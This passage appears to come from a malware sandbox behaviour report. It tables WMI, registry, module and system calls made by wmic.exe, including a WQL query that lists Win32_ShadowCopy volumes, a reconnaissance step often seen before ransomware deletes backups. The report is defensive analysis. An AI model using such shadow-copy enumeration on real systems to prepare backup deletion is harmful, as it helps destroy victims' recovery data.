Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = \\XDUWTFONO\ROOT\CIMV2	1	Fn
Execute	WBEMLocator	IWbemServices	method_name = ExecQuery, query_language = WQL, query = SELECT * FROM Win32_ShadowCopy	1	Fn

Registry (5)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging, data = 48	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging Directory	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Logging Directory, data = 37	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	value_name = Log File Max Size, data = 54	1	Fn

Module (3)

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\system32\kernel32.dll	base_address = 0x75a20000	1	Fn
Get Handle	c:\windows\syswow64\wbem\wmic.exe	base_address = 0x710000	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x75a4a84f	1	Fn

System (6)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = XDUWTFONO	1	Fn
Get Time	type = System Time, time = 2019-01-04 10:33:29 (UTC)	1	Fn
Get Time	type = Ticks, time = 92056	1	Fn
Get Time	type = Local Time, time = 2019-01-04 21:33:29 (Local Time)	1	Fn
Get Info	type = System Directory, result_out = C:\Windows\system32	2	Fn

Notifications (1/1)

Monitored Processes

Behavior Information - Grouped by Category

Before

After